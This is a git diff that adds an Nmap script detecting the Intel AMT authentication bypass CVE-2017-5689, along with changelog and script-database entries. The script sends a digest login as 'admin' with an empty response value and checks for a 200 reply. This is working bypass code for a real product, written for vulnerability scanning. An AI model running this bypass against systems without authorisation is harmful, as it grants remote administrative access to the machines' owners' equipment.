diff --git a/CHANGELOG b/CHANGELOG index 0e54dfeaa..266721e80 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,5 +1,9 @@ # Nmap Changelog ($Id$); -*-text-*- +o [NSE][GH#876] New script http-vuln-cve2017-5689 detects a privilege escalation + vulnerability (INTEL-SA-00075) in Intel Active Management Technology (AMT) + capable systems. [Andrew Orr] + o Extended Memcached service probe and added match for Apache ZooKeeper. [Paulino Calderon] diff --git a/scripts/http-vuln-cve2017-5689.nse b/scripts/http-vuln-cve2017-5689.nse new file mode 100644 index 000000000..baf43c792 --- /dev/null +++ b/scripts/http-vuln-cve2017-5689.nse @@ -0,0 +1,125 @@ +description = [[ +Detects if a system with Intel Active Management Technology is vulnerable to the INTEL-SA-00075 +privilege escalation vulnerability (CVE2017-5689). + +This script determines if a target is vulnerable by attempting to perform digest authentication +with a blank response parameter. If the authentication succeeds, a HTTP 200 response is received. + +References: +* https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability +]] + +local string = require "string" +local http = require "http" +local shortport = require "shortport" +local vulns = require "vulns" +local stdnse = require "stdnse" + +--- +-- @usage +-- nmap -p 16992 --script http-vuln-cve2017-5689 +-- +-- @output +-- PORT STATE SERVICE REASON +-- 16992/tcp open amt-soap-http syn-ack +-- | http-vuln-cve2017-5689: +-- | VULNERABLE: +-- | Intel Active Management Technology INTEL-SA-00075 Authentication Bypass +-- | State: VULNERABLE +-- | IDs: CVE:CVE-2017-5689 BID:98269 +-- | Risk factor: High CVSSv2: 10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C) +-- | Intel Active Management Technology is vulnerable to an authentication bypass that +-- | can be exploited by performing digest authentication and sending a blank response +-- | digest parameter. +-- | +-- | Disclosure date: 2017-05-01 +-- | References: +-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689 +-- | https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr +-- | http://www.securityfocus.com/bid/98269 +-- | https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf +-- | https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability +-- |_ https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability +-- +-- @xmloutput +-- +-- Intel Active Management Technology INTEL-SA-00075 Authentication Bypass +-- VULNERABLE +--
+-- CVE:CVE-2017-5689 +-- BID:98269 +--
+-- +-- 10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C) +--
+-- +-- Intel Active Management Technology is vulnerable to an authentication bypass that can be +-- exploited by performing digest authentication and sending a blank response digest parameter. +-- +--
+-- +--
+-- 05 +-- 01 +-- 2017 +--
+-- +-- 2017-05-01 +-- +-- https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr +-- https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf +-- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689 +-- https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability +-- https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability +-- http://www.securityfocus.com/bid/98269 +--
+-- +--- + +author = "Andrew Orr" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = { "vuln", "auth", "exploit" } + +portrule = shortport.port_or_service({623, 664, 16992, 16993, 16994, 16995}, "amt-soap-http") + +action = function(host, port) + local vuln = { + title = "Intel Active Management Technology INTEL-SA-00075 Authentication Bypass", + state = vulns.STATE.NOT_VULN, + risk_factor = "High", + scores = { + CVSSv2 = "10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)", + }, + description = [[ +Intel Active Management Technology is vulnerable to an authentication bypass that +can be exploited by performing digest authentication and sending a blank response +digest parameter. + ]], + IDS = {CVE = "CVE-2017-5689", BID = "98269"}, + references = { + 'https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr', + 'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability', + 'https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf', + 'https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability' + }, + dates = { disclosure = { year = '2017', month = '05', day = '01' } } + } + + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + local response = http.get(host, port, '/index.htm') + + if response.header['server'] and response.header['server']:find('Intel(R) Active Management Technology', 1, true) + and response.status and response.status == 401 then + local www_authenticate = http.parse_www_authenticate(response.header['www-authenticate']) + local auth_header = string.format("Digest username=\"admin\", realm=\"%s\", nonce=\"%s\", uri=\"index.htm\"," .. + "cnonce=\"%s\", nc=1, qop=\"auth\", response=\"\"", www_authenticate[1]['params']['realm'], + www_authenticate[1]['params']['nonce'], stdnse.generate_random_string(10)) + local opt = { header = { ['Authorization'] = auth_header } } + response = http.get(host, port, '/index.htm', opt) + if response.status and response.status == 200 then + vuln.state = vulns.STATE.VULN + end + end + + return vuln_report:make_output(vuln) +end diff --git a/scripts/script.db b/scripts/script.db index 6912af718..f9ee1a7ed 100644 --- a/scripts/script.db +++ b/scripts/script.db @@ -263,6 +263,7 @@ Entry { filename = "http-vuln-cve2014-8877.nse", categories = { "exploit", "intr Entry { filename = "http-vuln-cve2015-1427.nse", categories = { "intrusive", "vuln", } } Entry { filename = "http-vuln-cve2015-1635.nse", categories = { "safe", "vuln", } } Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", } } +Entry { filename = "http-vuln-cve2017-5689.nse", categories = { "auth", "exploit", "vuln", } } Entry { filename = "http-vuln-misfortune-cookie.nse", categories = { "intrusive", "vuln", } } Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } } Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } }